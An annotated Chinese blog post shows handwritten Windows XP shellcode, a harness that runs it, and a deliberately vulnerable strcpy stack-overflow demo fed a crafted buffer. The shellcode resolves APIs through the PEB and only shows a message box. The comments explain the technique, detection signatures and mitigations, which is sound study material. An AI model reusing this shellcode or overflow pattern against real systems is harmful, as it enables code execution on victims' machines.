
熊猫正正的博客

熊猫正正的天空

 
 
 

日志

 
 

xp下的一段shellcode  

2012-03-29 14:51:17|  分类: Win32汇编写病毒 |  标签: |举报 |字号 订阅

// Position-independent 32-bit x86 Windows payload (225 bytes), kept as data.
// Reading of the bytes below (decoded by hand; confirm with a disassembler):
//   - E9 .. / E8 .. / 5A is the jmp-call-pop idiom: it obtains the run-time
//     address of the string table at the end of the array, so the code needs
//     no absolute addresses of its own.
//   - 64 A1 30 00 00 00 followed by loads at +0x0C, +0x1C and +0x08 reads the
//     PEB through fs:[0x30] and follows the loader's module list to a module
//     base address.
//   - The middle part checks for the 'P' of the PE signature, reads the export
//     directory at +0x78 and compares names with repe cmpsb (F3 A6), i.e. it
//     resolves API addresses by export name at run time.
//   - The tail is plain ASCII: "LoadLibraryA", "user32", "MessageBoxA",
//     "ExitProcess", "OK". The visible effect appears to be one message box
//     followed by process exit.
// Detection notes: the fs:[0x30] access sequence and plaintext API names
// inside a data buffer are common signature and heuristic anchors for this
// class of payload.
char strShellCode[] = {
0xE9,  0xA8,  0x00,  0x00,  0x00,  0x5A,  0x64,  0xA1,  0x30,  0x00,  0x00,  0x00,  0x8B,  0x40,  // jmp to the call at the end; pop edx; PEB read begins
0x0C,  0x8B,  0x40,  0x1C,  0x8B,  0x00,  0x8B,  0x40,  0x08,  0x50,  0x52,  0x6A,  0x0C,  0xE8,  
0x2F,  0x00,  0x00,  0x00,  0x5B,  0x83,  0xC3,  0x0D,  0x53,  0xFF,  0xD0,  0x83,  0xC3,  0x07,  
0x53,  0x6A,  0x0B,  0xE8,  0x1D,  0x00,  0x00,  0x00,  0x5B,  0x83,  0xC3,  0x18,  0x6A,  0x00,  
0x53,  0x53,  0x6A,  0x00,  0xFF,  0xD0,  0xBA,  0x0C,  0x00,  0x00,  0x00,  0x58,  0x2B,  0xDA,  
0x53,  0x52,  0xE8,  0x02,  0x00,  0x00,  0x00,  0xFF,  0xD0,  0x8B,  0xD8,  0x83,  0xC0,  0x3C,  
0x8B,  0x00,  0x03,  0xC3,  0x80,  0x38,  0x50,  0x75,  0x49,  0x8B,  0x40,  0x78,  0x03,  0xC3,  
0x50,  0x8B,  0xC8,  0x8B,  0x49,  0x14,  0x8B,  0x40,  0x20,  0x03,  0xC3,  0x55,  0x8B,  0xE8,  
0x33,  0xD2,  0x51,  0x8B,  0x00,  0x03,  0xC3,  0x8B,  0xF8,  0x8B,  0x74,  0x24,  0x14,  0x8B,  
0x4C,  0x24,  0x10,  0xFC,  0xF3,  0xA6,  0x75,  0x17,  0x83,  0xC4,  0x04,  0x8B,  0x44,  0x24,  
0x04,  0x8B,  0x40,  0x1C,  0x03,  0xC3,  0xC1,  0xE2,  0x02,  0x03,  0xC2,  0x8B,  0x00,  0x03,  
0xC3,  0xEB,  0x0B,  0x42,  0x83,  0xC5,  0x04,  0x8B,  0xC5,  0x59,  0xE2,  0xCC,  0x33,  0xC0,  
0x5D,  0x59,  0xC2,  0x04,  0x00,  0xE8,  0x53,  0xFF,  0xFF,  0xFF,  0x4C,  0x6F,  0x61,  0x64,  // call back to the pop; string table starts: "Load"
0x4C,  0x69,  0x62,  0x72,  0x61,  0x72,  0x79,  0x41,  0x00,  0x75,  0x73,  0x65,  0x72,  0x33,  // "LibraryA\0", "user3"
0x32,  0x00,  0x4D,  0x65,  0x73,  0x73,  0x61,  0x67,  0x65,  0x42,  0x6F,  0x78,  0x41,  0x00,  // "2\0", "MessageBoxA\0"
0x45,  0x78,  0x69,  0x74,  0x50,  0x72,  0x6F,  0x63,  0x65,  0x73,  0x73,  0x00,  0x4F,  0x4B,  // "ExitProcess\0", "OK"
0x00
};

int main(int argc, char* argv[])
{
    // Test harness: reinterprets the start of the strShellCode data array as a
    // parameterless _stdcall function and calls it. argc and argv are unused.
    //
    // The array is ordinary initialised data, so the call only runs where data
    // pages are executable. With DEP/NX enforced for the process, the first
    // instruction fetch from the array faults with an access violation, which
    // is the mitigation that stops data being run as code.
    void (_stdcall *entry)() = (void (_stdcall*)())&strShellCode[0];

    entry();
    return 0;
}



//溢出漏洞利用
#include <string>

// Input for the OverFlow() demo: 8 filler bytes (0x41 x4, 0x42 x4) that fill
// the 8-byte destination buffer, then the little-endian dword 0x0040603C, then
// the same 225-byte payload as in the first listing.
// NOTE(review): 0x0040603C looks like a hard-coded address inside this program
// image, presumably where the payload sits in the author's build - confirm.
// A fixed address like this only holds while the image loads at its preferred
// base; ASLR and image relocation invalidate it.
// strcpy() stops at the first 0x00 byte, which is the high byte of that dword,
// so only the first 12 bytes are copied out of this array. The payload itself
// is never copied and stays in this global data buffer, where DEP/NX applies.
char strShellCode[] = {
0x41,  0x41,  0x41,  0x41,
0x42,  0x42,  0x42,  0x42,
0x3c,  0x60,  0x40,  0x00,
0xE9,  0xA8,  0x00,  0x00,  0x00,  0x5A,  0x64,  0xA1,  0x30,  0x00,  0x00,  0x00,  0x8B,  0x40,  
0x0C,  0x8B,  0x40,  0x1C,  0x8B,  0x00,  0x8B,  0x40,  0x08,  0x50,  0x52,  0x6A,  0x0C,  0xE8,  
0x2F,  0x00,  0x00,  0x00,  0x5B,  0x83,  0xC3,  0x0D,  0x53,  0xFF,  0xD0,  0x83,  0xC3,  0x07,  
0x53,  0x6A,  0x0B,  0xE8,  0x1D,  0x00,  0x00,  0x00,  0x5B,  0x83,  0xC3,  0x18,  0x6A,  0x00,  
0x53,  0x53,  0x6A,  0x00,  0xFF,  0xD0,  0xBA,  0x0C,  0x00,  0x00,  0x00,  0x58,  0x2B,  0xDA,  
0x53,  0x52,  0xE8,  0x02,  0x00,  0x00,  0x00,  0xFF,  0xD0,  0x8B,  0xD8,  0x83,  0xC0,  0x3C,  
0x8B,  0x00,  0x03,  0xC3,  0x80,  0x38,  0x50,  0x75,  0x49,  0x8B,  0x40,  0x78,  0x03,  0xC3,  
0x50,  0x8B,  0xC8,  0x8B,  0x49,  0x14,  0x8B,  0x40,  0x20,  0x03,  0xC3,  0x55,  0x8B,  0xE8,  
0x33,  0xD2,  0x51,  0x8B,  0x00,  0x03,  0xC3,  0x8B,  0xF8,  0x8B,  0x74,  0x24,  0x14,  0x8B,  
0x4C,  0x24,  0x10,  0xFC,  0xF3,  0xA6,  0x75,  0x17,  0x83,  0xC4,  0x04,  0x8B,  0x44,  0x24,  
0x04,  0x8B,  0x40,  0x1C,  0x03,  0xC3,  0xC1,  0xE2,  0x02,  0x03,  0xC2,  0x8B,  0x00,  0x03,  
0xC3,  0xEB,  0x0B,  0x42,  0x83,  0xC5,  0x04,  0x8B,  0xC5,  0x59,  0xE2,  0xCC,  0x33,  0xC0,  
0x5D,  0x59,  0xC2,  0x04,  0x00,  0xE8,  0x53,  0xFF,  0xFF,  0xFF,  0x4C,  0x6F,  0x61,  0x64,  
0x4C,  0x69,  0x62,  0x72,  0x61,  0x72,  0x79,  0x41,  0x00,  0x75,  0x73,  0x65,  0x72,  0x33,  
0x32,  0x00,  0x4D,  0x65,  0x73,  0x73,  0x61,  0x67,  0x65,  0x42,  0x6F,  0x78,  0x41,  0x00,  
0x45,  0x78,  0x69,  0x74,  0x50,  0x72,  0x6F,  0x63,  0x65,  0x73,  0x73,  0x00,  0x4F,  0x4B,  
0x00
};

// Deliberately vulnerable demo function: copies the NUL-terminated string at p
// into an 8-byte stack buffer with no length check (stack-based buffer
// overflow, CWE-121). Any input of 8 or more characters writes past the end of
// str; what lies there depends on the compiler's frame layout.
// In real code, bound the copy to the destination size and treat truncation as
// an error, e.g. snprintf(str, sizeof str, "%s", p) with the result checked.
// Compiler stack cookies (MSVC /GS) are the build-time mitigation meant to
// detect this kind of overwrite before the function returns.
void OverFlow(char* p)
{
char str[8];
strcpy(str,p); // unbounded copy: the length is set by the source, not by sizeof str
}


// Demo driver: passes the crafted global buffer to the vulnerable OverFlow().
// The result is undefined behaviour and depends on compiler, build options and
// platform mitigations (stack cookies, DEP/NX, ASLR); argc and argv are unused.
int main(int argc, char* argv[])
{
OverFlow(strShellCode); // the string is longer than the 8-byte destination, so strcpy writes past it
// Direct call kept from the first listing, disabled here:
// ((void (_stdcall*)())&strShellCode[0])();
return 0;
}